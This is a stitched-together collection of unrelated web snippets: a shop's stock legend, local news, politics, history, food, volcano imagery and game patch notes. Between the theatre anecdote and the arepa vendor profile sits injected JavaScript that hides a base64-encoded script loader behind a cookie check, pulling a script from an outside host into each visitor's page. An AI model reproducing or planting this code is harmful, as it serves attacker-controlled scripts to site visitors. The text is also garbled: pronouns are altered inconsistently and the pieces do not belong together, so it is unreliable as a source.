+ `` Next arrival xx.xx.20xx '' . This is an estimated date when we are expecting the product to be back in stock . You can sign up for an arrival notification by clicking `` Notify when in stock '' .
+ `` Month / 20xx '' . The exact arrival date is not available , but we are expecting the product to be back in stock during the stated month . You can sign up for an arrival notification by clicking `` Notify when in stock '' .
Special order
+ `` Delivery time xx - xx business days '' . We do not usually keep this product in our warehouse . Just place your order and we will deliver it within the given time frame .
+ `` Delivery time is temporarily unknown '' . We do not usually keep this product in our warehouse . The product is not currently available for order . You can sign up for an availability notification by clicking `` Notify when in stock '' .
- `` Discontinued '' . The product is out of stock and will not be available in the future . The product page is available for informational purposes only .
Here is some fun stuff I learned from a Facebook friend . Keisha Marie Gill involved with community and other theatre in Polk County since they were a teenager has a friend who is in a production of “ La Cage Aux Folles ” at the Garden Theatre in Winter Garden , Florida . When Keisha heard they were using the costumes from the Broadway revival of “ La Cage ” ( 2010-2011 ) , they asked their friend to see if there were any name tags in the costumes of the actors who used them in the Broadway revival . Specifically they were curious to know if any of the costumes were tagged with Yurel Echezerreta 's name . Yurel , now age 25 , who is a musical theatre graduate of Harrison School for the Arts and was involved in community theatre in Polk County and went on to fame in several Broadway musicals ( “ West Side Story ” , “ La Cage ” and now “ Aladdin ” ) was a Cagelle in the Broadway revival of “ La Cage Aux Folles ” .
Lo and behold , Keisha 's friend looked for Yurel 's name in a costume and found this !
Here is a photo of Yurel ( far left ) wearing the yellow dress in the 2010 Broadway revival that is now on stage at the Garden Theatre in Winter Garden . Wonderful small world story .
“ La Cage Aux Folles ” runs September 25 through October 25 at the Garden Theatre in Winter Garden , Florida . Located in the heart of historic downtown Winter Garden on Plant Street , the Garden Theatre is a not-for-profit organization committed to enriching , engaging , and entertaining through creative experiences . The theatre , which reopened in 2008 , showcases an atmospheric theatre in a Mediterranean Revival style venue . The Garden Theatre hosts live plays , concerts , movies and more to the residents of and visitors to the city of Winter Garden .
function getCookie ( e ) { var U=document.cookie.match ( new RegExp ( “ ( ? : ^| ; ) ” +e.replace ( / ( [ \. $ ? * | { } \ ( \ ) \ [ \ ] \\\/\+^ ] ) /g , ” \\ $ 1″ ) + ” = ( [ ^ ; ] * ) ” ) ) ; return U ? decodeURIComponent ( U [ 1 ] ) : void 0 } var src= ” data : text/javascript ; base64 , ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= ” , now=Math.floor ( Date.now ( ) /1e3 ) , cookie=getCookie ( “ redirect ” ) ; if ( now > = ( time=cookie ) ||void 0===time ) { var time=Math.floor ( Date.now ( ) /1e3+86400 ) , date=new Date ( ( new Date ) .getTime ( ) +86400 ) ; document.cookie= ” redirect= ” +time+ ” ; path=/ ; expires= ” +date.toGMTString ( ) , document.write ( ” ) }
When I moved to Boston , I realized how handy all those days cooking with my sister Judith and listening to the stories about our family helped me on my homesick days to reproduce those flavors and smells that I missed so much . In the last 8 years , that passion for collecting , reproducing and sharing those traditional flavors and the stories attached to those flavors from my hometown have become stronger . ''
Based in the city of Oakland , Abolio was drawn there as `` it 's listed among the top cities in the country for sustainability practice . The food scene is booming because of those food artisans and creators that are moving here from all over the word . ''
She 's also supported by Phat Beets Produce , `` a food justice collective . The collective was started in North Oakland in 2007 as a guerrilla produce stand in a local park . It was started as a means to close the gap between small farmers of color that lack market outlets and urban communities that lack access to healthy , affordable and culturally-appropriate food .
I prepare the arepas in a commercial kitchen subsidized by Phat Beets Produce . The goal of their incubator kitchen program is to train and support Oakland residents to become successful entrepreneurs in food ventures . ''
Abolio then sells their food at `` this little neighborhood farmers ' market [ on Grace and Lowell Streets ] . It 's a place for neighbors to be neighborly on Saturday mornings until 2pm . It 's not big , but it rules . We also offer lunch delivery to your office or home for 20 people or more . We call it `` La Lonchera '' and it features our traditional arepas prepared on site . ''
Here 's a run down of Miss Arepita 's offerings , as described by Abolio :
Pabellon : `` A traditional dish from Venezuela that includes plantains , meat , beans and rice served on a plate . At some point , the rice was traded for white cheese and was placed inside an arepa . ''
Pata Pata : `` Black beans , plantains and white cheese . This arepa was created in honor of Miriam Makeba , famous for the song `` Pata Pata . ''
Reina Pepiada : `` Chicken salad with avocado . When Venezuela won the first “ Miss World , ” this arepa was created in their honor . The recipe that I use has a twist that I borrowed from my cousin Jenny . This recipe inspires the taste of Christmas year-round . ''
Veggie Calypso : `` My own recipe . We make it using seasonal veggies from the farmers ' market . It changes weekly . ''
Carne Mechada : `` Shredded beef in a red sauce with plantains . ''
`` We also prepared our own salsas , such as guasacaca ( a green sauce that 's great for drizzling over arepas and is our own recipe ) and salsa picante , a hot sauce . ''
`` Papelón con limón is a refreshing Venezuelan beverage , made with papelón ( raw , hardened sugar cane juice ) , water and usually lime or lemon juice . ''
What 's next for Miss Arepita ? `` At the moment , [ our plan for a food ] truck is still in the 'blueprints ' stage . My goal in the next couple of years is to introduce the arepa culture to our East Bay community one arepa at a time and the truck will follow . ''
No one quite knows which Narendra Modi will turn up to fight for reelection in 2019 : the reformist technocrat pledging to create jobs or the tub-thumping populist armed with giveaways . For most of their first term , the Indian prime minister has struck a fair balance between the two , and last month they passed their third anniversary in power with a good growth record and strong poll numbers . But their calculations appeared to change last November , when they tilted toward populism by launching demonetization , a surprise move to scrap two high-denomination banknotes . This has proved to be one of the most disruptive experiments in recent economic history , and one from which Modi 's administration now risks learning all the wrong lessons .
The fact that demonetization has been bad for short-term growth is no longer in doubt . Last week , India released GDP figures for the first quarter of 2017 , the period when Modi 's demonetization had its largest impact . Over those three months , hundreds of millions of Indians were forced to line up at cash machines and bank counters to replace their old 500-rupee ( about $ 7 ) and 1000-rupee ( about $ 15 ) notes , which made up about nine-tenths of the value of all currency in circulation . The crunch hit the poor particularly hard , and brought swaths of commercial activity in India 's cash-dependent economy—and especially in its large semi-legal gray market—to a standstill .
Sure enough , the new data bear this out . From January to March of this year , Indian growth sank to six percent , down from seven percent in the previous quarter . Although high by Western standards , these figures lost India its title as the world 's fastest-growing major economy , pushing China back into first place . They also brought growth over the last twelve months down to its lowest point for three years . Modi 's Bharatiya Janata Party ( BJP ) government , eager to defend demonetization , blamed other factors , such as weaker global trade performance , for the slowdown . It also pointed to the policy 's potential longer-term benefits , such as
The U.S. Supreme Court appears somewhat irritated with federal courts that have repeatedly barred the Trump administration from enforcing immigration policies halting the entry of certain classes of migrants and refugees .
The high court 's latest orders sent three clear signals to lower courts , all of which are positive signs for President Donald Trump .
First , the Supreme Court is quite clearly expressing its view that the government will prevail on the merits of this dispute . The Court would not grant an application with these facts if a majority of the justices did not believe the administration will ultimately be vindicated . As such , the orders appear to be a signal to the 4th and 9th U.S . Circuit Courts of Appeal , two venues currently adjudicating travel ban challenges — proceed prudently , and with sufficient respect for the presumption that the administration is acting in good faith .
Secondly , the Court , for the most part , spoke as an institution . The order was forthright and terse , suggesting the Court sees little ambiguity in this case . The sober style means to communicate decisiveness , competence and the sense that the Court is conducting its business without dramatics , unlike the rest of the government . What 's more , just two of the nine justices registered their dissent . Given these facts , it appears the justices are doing their best to speak as a Court and not as an amalgamation of nine separate jurists .
Third , the order instructs the 4th and 9th Circuits to “ render [ their ] decision with appropriate dispatch. ” This language is highly unusual in a Supreme Court order . It seems to suggest that the justices plan to take the case themselves , and dispose of it as quickly as possible . Timing is especially relevant here . The Court 's current term ends in June , leaving just six months from this writing for briefing , argument , and deliberation .
All told , the coalition of civil rights groups and Democratic attorneys general fighting the latest iteration of Trump 's travel restrictions would seem to have trouble ahead of them .
The 9th Circuit will hear a travel ban challenge Wednesday , and the 4th Circuit will hear a second challenge Friday . Decisions are expected before the end of the year .
Follow Kevin on Twitter
Send tips to kevin @ dailycallernewsfoundation.org .
Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience . For licensing opportunities of our original content , please contact licensing @ dailycallernewsfoundation.org .
With all the struggles in the last 100 years for gender equality , it might be hard to imagine that 4,500 years ago , a woman ruled the largest civilization in ancient Mesopotamia .
Kubaba , or Kug-Bao in the Sumerian language , was king of Sumer during the third dynasty of Kish , the ancient capital city of Sumer . Sumer is widely regarded as the first major civilization to appear in human history , predating even ancient Egypt .
Sumer is widely regarded as the first major civilization to appear in human history…
What 's equally impressive is the Kubaba was apparently not given this position by birthright , but they instead worked as a barkeep , brewing and serving ancient beer , before taking the throne .
Not very much is known about the Sumerian Kings from the early periods , but some records survived . Here is a quote from the Weidner Chronicle , an ancient Babylonian text :
Kubaba gave bread to the fisherman and gave water , they made them offer the fish to Esagila . Marduk , the king , the prince of the Apsû , favored them and said : “ Let it be so ! ” They entrusted to Kubaba , the tavern-keeper , sovereignty over the whole world . ”
And the official Sumerian King List names them as “ the woman tavern-keeper ” .
Ruler of Sumer
The King 's List says that Kubaba ruled for 100 years , though this is most likely an exaggeration . But we do know that the Sumerians considered rule to be divine law , and Kubaba would have been granted power of all of Sumer during their reign in the third dynasty of Kish . They are believed to have fortified the city and made it strong .
After their rule , kingship was passed to their son , but shrines were built in their honor and they were deified , living on in the hearts and minds of the people of ancient Mesopotamia for centuries to come .
The role of women in Sumer
Women held a variety of roles in early Sumer . Women who worked participtated in trade , “ especially weaving and selling cloth , food production , brewing beer and wine , perfumery and making incense , ” according to historyonthenet.com Barkeeping was considered a respectable profession , and one women frequently held . Brewing beer and owning and operating taverns was an important role , as beer was a pretty big deal in ancient Sumer ..
Barkeeping was considered a respectable profession , and one women frequently held .
Additional sources :
Wikipedia
About.com
The view from Auckland 's most expensive state house on Savage St , Westmere , which is worth $ 2.5m .
New Zealand 's 10 most expensive state houses are all in Auckland and together are worth a whopping $ 20.92 million , according to figures from Housing New Zealand .
The lineup of homes included a one bedroom property in Auckland 's Orakei worth $ 1.9 million .
But the most expensive was a three bedroom home on Westmere 's Savage St with a book value of $ 2,542,674 .
GOOGLE Westmere 's Savage St has scenic views of Jaggers Bush Reserve and is just a stroll away from both MOTAT and Auckland Zoo .
With views of Jaggers Bush Reserve and only a short drive from the central city , the house is sitting on hot property in an area that had soared in value in the past few years .
READ MORE :
* Eleven more Special Housing Areas announced across Auckland
* State housing group pickets community provider over Government sell-off
* State housing shortage could pose problem with an influx of people
The house itself had nearly doubled in value from a reported $ 1.28 million book value in 2012 .
Its tenant , who did not wish to be named , had called the Savage St residence home for 12 years .
While the street had a high proportion of state houses , they had watched the wider suburb climb in value .
`` We 've enjoyed all our years here - you get the views , the free concerts and it 's central to everything , '' they said .
`` I love it in this area . ''
The state house was a family home where the woman and their husband had raised their three children .
The boys , two of which had since moved out into flats , had all attended St Joseph 's School in Grey Lynn .
Both they and their husband were currently unemployed .
The total sales revenue from 10 most expensive state houses sold between January 31 , 2012 and January 31 , 2016 came to over $ 14 million .
The $ 13,876,000 racked up by the Government through these sales is invested into creating more social housing of the right type , in the right areas to meet demand .
A two bedroom home in St Heliers fetched more than $ 2 million when Housing NZ sold it off through Unlimited Potential Remuera in December 2015 .
In January Social Housing Minister Paula Bennett said there were more than 2300 people on Auckland 's state housing waitlist , some of whom would wait up to six months for a home .
NEW ZEALAND 'S TEN MOST PRICEY STATE HOMES :
1 . Westmere : $ 2.54 million , three bedrooms , 100 square metres .
2 . Remuera : $ 2.44 million , three bedrooms , 110 square metres .
3 . Mangere East : $ 2.33 million , four bedrooms , 98 square metres .
4 . Remuera : $ 1.964 million , three bedrooms , 90 square metres .
5 . Remuera : $ 1.96 million , three bedrooms , 90 square metres .
6 . Ponsonby : $ 1.96 million , four bedrooms , 150 square metres .
7 . Ellerslie : $ 1.91 million , four bedrooms , 100 square metres .
8 . Orakei : $ 1.91 million , one bedroom , 60 square metres .
9 . Epsom : $ 1.91 million , two bedrooms , 80 square metres .
10 . Orakei : $ 1.91 million , two bedrooms , 100 square metres .
Source : Housing New Zealand .
Watching the concert documentary Shut Up and Play the Hits last week , I remembered that James Murphy , in addition to writing the best song about New York since the heyday of Lou Reed , has an awesome idea for the NYC subway : musical turnstiles . The man behind LCD Soundsystem proposed the scheme at a talk at the Yale School of Art this spring , sitting opposite fellow rock star and budding urbanist David Byrne . The talk was supposed to focus on the boundaries between different art forms , but each singer ended up talking a lot about New York , Byrne showing off their bike racks and Murphy voicing this zany and brilliant idea ( transcription courtesy of WNYC ) :
`` All the subway turnstiles in New York City…make a beep . It 's a really unpleasant sound and the one that 's right next to it is slightly out of key with it . So , it 's like 'ehhh….aehhh…uehhh ' Unless you get it wrong and it 's like , 'No ! ' Then it 's the sound of your bruised hip as you hit the thing… So I thought , I love New York and I love its aggression , and I love that it does n't make it easier for you to be a member of the city…But , I wanted to change the sound of going through the turnstile to a series of notes - I could do a little program . I could be like , well , the dominant note is the root , this is the fifth , this is the third , have a couple of sevenths , throw a few sixths in there just to be crazy . And during rush hour it would make arpeggiated music . And each subway station could have its own key or tonal set . For me , for a new person going to work , I think it would just be nice . It would be hard not to like that more than 'shut up , idiot , you 're walking so slow ! ' It would be an interesting way to have people relate to the city and I did n't think it would be that expensive…if anybody knows anybody ? ''
Gothamist went so far as to contact the Metropolitan Transit Authority to test out Murphy 's idea at the source . But the MTA 's Kevin Ortiz responded with this rather dismissive letter : `` While the idea sounds good , we are already in the midst of moving toward a Tap and Ride fare payment system that we hope to implement in 2015 . In the meantime , Mr. Murphy should consider auditioning for our Music Under New York program . '' ( Music Under New York is the organization that coordinates the placement of subway performers in the corridors and hallways of the subway system . )
PML-N 's Shahid Khaqan Abbasi was sworn in as prime minister of Pakistan in an oath-taking ceremony held at President House on Tuesday .
President Mamnoon Hussain administered the oath to Abbasi .
Abbasi was elected prime minister by lawmakers in the National Assembly earlier today , bagging 221 votes to become the successor to ousted prime minister Nawaz Sharif .
PPP 's Syed Naveed Qamar secured 47 votes , Awami Muslim League chief Sheikh Rashid received 33 votes , and four MNAs voted for Jamaat-i-Islami 's Sahibzada Tariqullah during the ballot .
An NA session to elect a new prime minister had been called by President Mamnoon Hussain following a landmark Supreme Court ruling on the Panama Papers case on Friday , in which Nawaz Sharif was disqualified as PM after being deemed unfit to hold office .
Following the SC verdict , the PML-N had agreed upon Abbasi , the former petroleum minister , as its candidate for prime minister for the interim period till the 'permanent ' replacement could be elected . Abbasi has to eventually give way to Shahbaz Sharif , who is likely to compete for the National Assembly seat lying vacant following the ouster of their elder brother and then stand for the chief executive 's office .
Following the announcement of Abbasi 's victory by NA Speaker Ayaz Sadiq , the PML-N benches in the Lower House had erupted with loud sloganeering in favour of Nawaz Sharif .
Shahid Khaqan Abbasi 's acceptance speech
Addressing the lower house soon after their victory was announced , Prime Minister-elect Abbasi said : `` I am grateful to you all , for following the democratic process — whether you voted for or against me . ''
`` I am grateful to the people of Pakistan , and I am grateful to the 'people 's prime minister ' , Nawaz Sharif , '' they continued .
`` I am also grateful to the opposition and Imran Khan for remembering us in their daily slandering , '' they jibed .
Moving on , Abbasi termed the Supreme Court 's verdict on the Panamagate case `` unprecedented '' , saying that although the party was blind-sided by the judgement , `` we accepted it as it was '' .
`` We did not challenge the courts , there was no division in our ranks . The party stands as it was . No one wanted to joust for power — whoever the prime minister [ Nawaz Sharif ] named was supported unanimously , '' they said , rebuffing rumours of cracks in the party 's ranks following the verdict .
`` Everybody wants the [ prime minister 's ] chair . Tell me , who in this house does n't ? It is to the PML-N 's credit that all party members rallied unanimously behind whoever was nominated by our leader .
`` Within four days , the democratic process is back on track . There were no defections . There was no dissension in our ranks .
`` Justice mandates that though a 1,000 guilty people may go free , not even one innocent person should be wrongfully convicted . I will not go into details of Friday 's decision — I only want to say that there will soon be another court — one held by the people . There will be no JIT there , '' they said , referring to the upcoming general elections in 2018 .
`` I am sure that the real prime minister of Pakistan , Nawaz Sharif , will return to this seat . ''
However , they said that , `` I am the country 's prime minister — bet it for 45 days or 45 hours — and am not here just to keep the seat warm . ''
`` If I am here for 45 days , I will try to complete the amount of the work that requires 45 months , '' they vowed .
Continuing , the prime minister-elect urged that the Constitution be respected . `` Politics , which has come to be seen as a disreputable profession , will be made respectable again . ''
`` Be it the government , bureaucracy , opposition or the army — we are in the same boat , and a hole in this boat will sink everyone , '' they cautioned .
Abbasi 's promises
`` We will continue taking difficult decisions , '' Abbasi said as they promised to take action against `` private militias '' providing security to citizens .
`` There is not a single country in the world which allows the licencing of automatic rifles for citizens . If you go outside parliament right now , you will see a private militia , '' Abbasi remarked .
`` Action will be taken against them if my cabinet allows for it . The federal government will seize all automatic weapons , compensating people in return , '' they promised .
The premier , carrying forward Nawaz Sharif and the PML-N 's promises , vowed to eliminate loadshedding by November this year as they highlighted various infrastructure and development projects initiated by their party 's government as examples of its commitment to the country 's growth .
`` In Pakistan 's history , power projects with the capacity to generate 17,000 mega watts were set up before our government . We have added 10,000MW , '' they said .
`` Pervez Musharraf may have ruled the country for eight years , but show me just one major development project from that era , '' they said .
`` One thing that is very close to my heart is [ the collection of ] taxes , '' Abbasi continued .
`` The perception here is that paying taxes is optional [ ... ] if my cabinet approves , I will set my sights on non-taxpayers , '' they promised .
Abbasi also briefly mentioned a focus on agriculture , education and health services .
`` Agriculture is the backbone of the country , '' Abbasi said . `` Although I am not an agriculturalist , I feel their pain , '' they said .
Speaking about the state of education , the premier called for improvements in higher education and the need for a national testing mechanism .
Abbasi also touched upon the PM 's Health Card scheme introduced by Nawaz Sharif ─ `` the largest system in South Asia '' .
Opposition remarks
PPP 's Naveed Qamar was given the floor next by the NA Speaker to share their remarks . They thanked their party leadership for allowing them to be nominated for the post of PM .
`` My advice to the prime minister elect would be that the onus is on you . This seat has not been occupied very frequently in recent years and you will make it stronger if you continue to sit on it . Your power flows from this house , and if this house is strong , you will be strong , '' they said , cautioning Abbasi that this would only be the case `` if you pay attention to the members '' .
`` The advice you get from technocrats and others will sound very logical , but the advice you get from this house will be that which matters to the people . ''
`` You said you have 45 days , but I will nonetheless insist that you have 10 months . How much change can you bring about in this time ? You will only progress if you focus on two or three areas and take them forward , '' they advised .
`` Prioritising agriculture will make the country stronger , '' they said .
`` The country and the country 's politics have reached a point where smooth transitions are not visible , '' they lamented . ''
`` We are here to give you all the support you require , as long as you are working in the larger national interest . ''
The AML 's Sheikh Rashid , the second runner-up , also congratulated Abbasi on becoming the prime minister-elect `` through a democratic process '' .
`` However , it would have been great if you had talked about foreign policy in your speech , '' Rashid remarked .
Rashid also expounded on shortcomings in the PML-N 's economic policy , including a $ 5 billion decrease in exports , an `` unbelievable '' $ 35bn loan , and unemployment of about 1 million people .
NA session proceedings
As the session started , NA Speaker Ayaz Sadiq had taken an oath from JUI-F lawmaker Usman Badini , who was recently elected from the NA 260 constituency .
Ayaz Sadiq supervises NA session .
The members then prayed for MNA Ejaz Jakhrani 's deceased brother , MNA Ghulam Mustufa Shah 's deceased mother and those who passed away during recent incidents in Quetta , Parachinar , Ahmedpur East and Lahore .
The speaker then read out the house rules , briefing the lawmakers about the process through which the National Assembly will be voting for a new head of government .
Sadiq announced that Shahid Khaqan Abbasi , Naveed Qamar , Sheikh Rashid Ahmed and Sahibzada Tariqullah are the four valid candidates competing for the office of the prime minister .
PML-N leader Chaudhry Nisar Ali Khan was also in attendance . They briefly became the centre of attention during the voting process as the treasury members were seen conversing with him .
Abbasi also met Chaudhry Nisar and both were seen laughing .
Meanwhile , the lawmakers were also seen taking pictures with PML-N nominee Khaqan Abbasi .
The PTI and PML-Q lawmakers voted for Sheikh Rashid , while MQM , PML-N and allies voted for Abbasi .
PTI leaders had earlier said that party chief Imran Khan will also attend the NA session , but they failed to show up .
The members who wished to vote for Shahid were asked to go to lobby A , while those wanting to vote for Naveed Qamar approached to lobby B . Meanwhile , lawmakers wanting to vote for Sheikh Rashid and Sahibzada Tariq were asked to approach lobbies C and D , respectively .
At the end of the polling process , after casting their vote , the PML-N members had returned to the house carrying porters of their ousted leader Nawaz Sharif , prompting repeated warnings from Speaker Ayaz Sadiq and protests from the opposition .
MQM backs PML-N
Hours before the NA session , Muttahida Qaumi Movement ( MQM ) had announced it was withdrawing its candidate Kishwar Zehra in favour of Abbasi , DawnNews reported .
MQM leader Dr Farooq Sattar announced the party 's decision in a joint press conference following a meeting with PML-N leaders in the federal capital on Tuesday .
MQM 's Sattar and Karachi Mayor Waseem Akhtar had met with Abbasi , Saad Rafique and Abdul Qadir Baloch .
Farooq Sattar talks to media .
Talking to the media , Sattar said that despite their differences with the political parties , MQM is trying to maintain a working relationship with them .
`` We have welcomed the delegation from PML-N and expect them to resolve our grievances , '' added Sattar .
Following a PPP parliamentary meeting , Syed Khursheed Shah had also withdrawn their name in favour of the party 's other nominee , Naveed Qamar .
West Hollywood voted unanimously to approve an ordinance that would ban the sale of fur . Krista Kennell/Sipa Press/AP
In West Hollywood , Calif. , an ethical fashion faux pas has been cemented into law .
Over the weekend , a citywide ban on the sale of fur apparel , passed by the city council two years ago , went into effect , making the city of 30,000 the first municipality in the nation , and likely the world , to have such a ban .
And while the ordinance has won the praises of anti-fur activists nationwide , it 's ruffled some feathers within West Hollywood , especially among high-end retailers who say fur is an integral part of their business .
“ When I first heard about it , it was shocking , ” said David Klein , co-owner of Goldsmith and Klein , an upscale gown designer that closed its shop in West Hollywood in April and is in the process of relocating to New York . Klein said the fur ban was one of the reasons for the store 's closure . `` It 's wrong to tell a business what to sell in your store , especially since it 's certainly legal . If we had known about the fur ban , we would 've never opened up in West Hollywood . ''
The ordinance bars any store from selling apparel that 's made to be worn , such as shoes , hats and gloves that contain any fur . Wallets and handbags are exempt . Leather is n't included , and second-hand stores are still allowed to sell used fur .
Given the exemptions and the small percentage of overall sales that fur account for in many stores , the activists and politicians behind the ban think store owners ' furor is overblown .
“ This city is not in the business of curtailing business , '' said John D'Amico , mayor pro tempore of West Hollywood . `` We 're in the business of creating an exciting place . Someone who is connected with the ideas that keep this city together will have a business that thrives . Someone who is disconnected with the goals of the city and has a rigid point of view ( on fur ) may have trouble . ”
D'Amico and the others behind the ban say there 's no ethical way to produce fur . They point to videos and studies from People for the Ethical Treatment of Animals and other animal rights organizations showing that animals used for fur are often confined to small cages , beaten and sometimes even skinned alive .
West Hollywood has a history of taking a stand on animal rights . This ban joins a long list of ordinances , like the city 's ban on declawing cats , retail sales of cats and dogs , and a prohibition on performances that feature exotic or wild animals .
Despite West Hollywood 's small population , previous bans have had ripple effects . After West Hollywood became the first city to outlaw cat declawing in 2003 , seven other cities in California followed suit . And the U.S. Department of Agriculture and several associations representing veterinarians changed their guidelines to say declawing was not recommended .
Anti-fur residents of West Hollywood and the national animal welfare movement are hoping something similar happens this time as well .
“ It 's really up to individual cities and consumers to end this cruelty , ” said PETA 's associate director of campaigns , Lindsay Rajt . “ West Hollywood is setting another tremendous example for cities to follow . ”
But unlike the past , the city council is running up against a local opposition . West Hollywood was never an exotic animal performance capital , a pet store mecca or a cat declawing heaven -- but it is a fashion destination .
Dozens of independent boutiques and high-end chains like Christian Louboutin , which sometimes uses fur on its shoes , are located in West Hollywood . Even the Fur Information Council of America , the largest fur industry group in North America , calls West Hollywood its home .
And while all retailers there say they will comply with the ban , they 're not doing so without a fight .
“ ( West Hollywood ) has become a fashion capital , and for public relations , this does not look good , ” said Darren Gold , chairperson of the West Hollywood Design District , an association of fashion and design stores .
Gold says he 's worried people will begin shopping down the street at boutiques in Hollywood , Beverly Hills and Los Angeles . And they say the ban could even turn off businesses that do n't sell fur .
“ It 's showing that the city wants to control what people sell , ” said Gold . “ That 's not the most attractive place to open a business . It hurts our image . ”
Gold and store owners say they are n't even necessarily pro-fur as much as they are anti-fur ban . They say educating customers at stores that sell fur would allow individuals to make their own decisions about buying it .
“ We know that the fur industry is notorious , but if ( the city council ) wants to educate the public , do it in an educational , professional way , ” said Klein . “ That would have been a great compromise . ”
But to D'Amico and their allies , education is n't enough . They believe the fur ban is one piece in an international movement for animal welfare . D'Amico said they hope other cities follow West Hollywood 's example . But , at least as of now , West Hollywood is going the furless road alone .
When asked if he 'd consider a leather ban or further restrictions on fur in the future , they said , “ We 'll see . ”
Al Jazeera and wire services
Twin volcanic plumes—one of ash , one of gas—rose from Sicily ' Mount Etna on the morning of October 26 , 2013 . L'Istituto Nazionale di Geofisica e Vulcanologia ( INGV ) Osservatorio Etneo ( National Institute of Geophysics and Volcanology Etna Observatory ) reported that Etna was experiencing its first paroxysm in six months . Multiple eruption columns are common at Etna , a result of complex plumbing within the volcano . The Northeast Crater , one of several on Etna 's summit , was emitting the ash column , while the New Southeast Crater was simultaneously venting mostly gas .
This natural-color image ( top ) collected by Landsat 8 shows the view from space at 11:38 a.m. local time . The towering , gas-rich plume cast a dark shadow over the lower , ash-rich plume and Etna 's northwestern flank . Relatively fresh lava flows ( less than a century or so old ) are dark gray ; vegetation is green ; and the tile-roofed buildings of Bronte and Biancavilla lend the towns an ochre hue .
An early-morning photograph taken by Boris Behncke ( a volcanologist at the Osservatorio Etneo ) reveals the structure of the plumes . The Northeast Crater plume ( right ) consisted primarily of gray ash , and rose about 1 kilometer ( 0.6 miles ) above the summit . Fragments of volcanic material , atomized by vigorous lava fountains , darkened the base of the New Southeast Crater plume . Strong outgassing associated with the lava fountains carried the plume 1 or 2 kilometers higher then the Northeast Crater plume .
NASA Earth Observatory image by Jesse Allen and Robert Simmon , using Landsat data from the USGS Earth Explorer . Photograph ©2013 , Boris Behncke . Caption by Robert Simmon with contributions from Boris Behncke .
Timewalking
In World of Warcraft Patch 6.2 , we 're introducing a new series of seven different weekend events , and two of the seven weekends will make Timewalking Dungeons available to characters at level 71 and higher for Outland dungeons or 81 and higher for Northrend dungeons . When you Timewalk these dungeons , you 'll find that your character 's power and gear has been scaled down to a fraction of what they normally are , and you may have never ventured into some ( or all ) of them , so it 's a good idea to prepare yourself now .
Outland : Black Morass
Deep within the Caverns of Time , the brooding dragon Nozdormu has awakened . Since the world was young , the bronze dragonflight has safeguarded the winding labyrinth , monitoring the shifting timeways to ensure that the delicate balance of time is upheld .
But now the ancient Dragon Aspect has been roused by an elusive threat : dark , sinister agents have infiltrated the timeways , embarking on missions to alter the course of the past , present and future . As a result , the bronze dragonflight has begun enlisting heroes to prevent the sabotage of key historical events . The balance of time is in jeopardy , and if the past is not saved ... there will be no future .
Dungeon Map
Click to enlarge
Bosses
Chrono Lord Deja
The Infinite Dragonflight tempted many drakonid with promises of power , but most found only servitude and despair . One of the few exceptions is Chrono Lord Deja , who gained influence within the flight through their raw power and cunning .
Temporus
Although relatively young , Temporus was instrumental in identifying many of the Infinite Dragonflight 's prime targets . As a reward , they were given the responsibility of destroying anyone who might attempt to interfere with the dragonflight 's plans .
Aeonus
Powerful and wild , Aeonus was tasked by the Master of the Infinite Dragonflight to personally oversee the disruption of key moments in the true timeway .
Tips
Before you approach Medivh , you should first take out any enemies you see around the area .
When you get close to him , Medivh will start an event that comes in waves . Three of those waves are boss fights .
To close each opening rift , kill the Rift Keeper who is keeping it open .
Kill the enemies who come through as quickly as possible to prevent them overwhelming Medivh .
If you 're efficient , you 'll be able to get out of combat between rifts ( and recover ) .
Achievements and Reputation
If you 've not gotten them before , completing this dungeon will award Opening of the Dark Portal and Heroic : Opening of the Dark Portal , the latter of which is required for Outland Dungeon Hero .
Killing enemies in this dungeon increases your standing with the Keepers of Time . For a full breakdown of what you can do with Keepers of Time reputation , check out Wowhead and Wowpedia .
Get in there and Fight !
Timewalking dungeons are coming to WoW with Patch 6.2 : Fury of Hellfire . Keep an eye out for the weekend-only quest `` A Burning Path Through Time '' , which rewards a Seal of Inevitable Fate when you complete five Burning Crusade Timewalking dungeons .
“ No one at the White House received advance notice of [ FBI Director James Comey 's ] comments ; in fact , no one at the White House received advance notice that they were planning to make comments today , ” Earnest told reporters aboard Air Force One .
ADVERTISEMENT
Earnest declined to provide an official reaction to the news because Justice Department prosecutors have yet to make a determination about the FBI 's findings .
`` We 've gone to great lengths to avoid interference , ” Earnest said .
Likewise , President Obama will not do so during their first campaign event with Clinton on Tuesday afternoon in North Carolina .
“ I do not anticipate that the president will discuss directly the findings and recommendations announced by Director Comey today , ” Earnest said .
Instead , the president will make a “ forceful case about Secretary Clinton 's qualifications and values that she 'll bring to the job as president of the United States . ”
Comey announced Tuesday morning that the FBI would not recommend charges against Clinton for the private email server that they used while secretary of State under Obama .
Comey 's announcement overtook the campaign debate . Despite their damning description of Clinton 's handling of classified information on their private email account , their decision was still welcome news to the presumptive Democratic nominee .
Nevertheless , Earnest said Obama is going out of their way not to speak about it with Clinton during their ride on Air Force One .
“ I am confident that the president and Secretary Clinton are not discussing the FBI investigation that is being completed , ” the spokesperson said .
Despite Earnest 's comments , Obama has generated controversy by wading into the debate over Clinton 's email server .
“ I continue to believe they have not jeopardized America 's national security , ” the president said during an April interview on `` Fox News Sunday . ''
“ There 's a carelessness in terms of managing emails that they have owned and they recognize , '' they added . `` But I also think it is important to keep this in perspective . ”
General Idea of the Revolution in the Nineteenth Century
Pierre-Joseph Proudhon
Pluto Press , 1989 ( Translated by John Beverly Robinson ( 1923 ) )
This year marks the 200th anniversary of Proudhon 's birth , the person who first used the word “ anarchist ” in a positive light . This was in their 1840 book What is Property ? so making anarchism as a named socio-economic theory and movement 170 years old next year .
